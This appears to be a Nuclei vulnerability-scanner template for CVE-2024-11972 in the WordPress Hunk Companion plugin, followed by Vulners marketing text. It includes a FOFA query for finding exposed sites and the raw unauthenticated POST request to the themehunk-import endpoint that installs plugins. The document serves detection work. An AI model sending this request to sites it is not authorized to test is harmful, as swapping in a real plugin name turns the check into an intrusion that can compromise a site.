id: CVE-2024-11972
info:
name: Hunk Companion < 1.9.0 - Unauthenticated Plugin Installation
author: s4e-io
severity: critical
description: |
The plugin does not correctly authorize some REST API endpoints, allowing unauthenticated requests to install and activate arbitrary plugins from the WordPress.org repo, including vulnerable plugins that have been closed.
impact: |
Unauthenticated attackers can install and activate arbitrary WordPress plugins including vulnerable or malicious ones, leading to potential site compromise.
remediation: |
Update Hunk Companion plugin to version 1.9.0 or later.
reference:
- https://wpscan.com/vulnerability/4963560b-e4ae-451d-8f94-482779c415e4/
- https://github.com/JunTakemura/exploit-CVE-2024-11972
- https://github.com/Nxploited/CVE-2024-11972-PoC
- https://github.com/RonF98/CVE-2024-11972-POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-11972
epss-score: 0.54754
epss-percentile: 0.98897
cpe: cpe:2.3:a:themehunk:hunk_companion:*:*:*:*:*:wordpress:*:*
metadata:
vendor: themehunk
product: hunk_companion
framework: wordpress
fofa-query: body="/wp-content/plugins/hunk-companion/"
tags: cve,cve2024,wordpress,wp,wp-plugin,hunk-companion,vkev,vuln
variables:
plugin: "{{to_lower(rand_text_alpha(6))}}"
x-wp-nonce: "{{to_lower(rand_text_alpha(12))}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-json/hc/v1/themehunk-import HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"params":{"templateType":"free","plugin":{"{{plugin}}": "{{plugin}}"},"allPlugins":[{"{{plugin}}": "{{plugin}}/{{plugin}}.php"}]},"headers":{"X-WP-Nonce":"{{x-wp-nonce}}"}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '"\"https:\\\/\\\/'
- type: word
part: content_type_2
words:
- "application/json"
- type: status
status:
- 200
# digest: 490a004630440220643532da36a56da7eb6c60909a050f7bfc9cb4947cc499358a4d4b7c14e482fe022063add739c0a68d1ad28e90547b1b150d804fb67f9abac0a2e6380728bbef5b2a:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation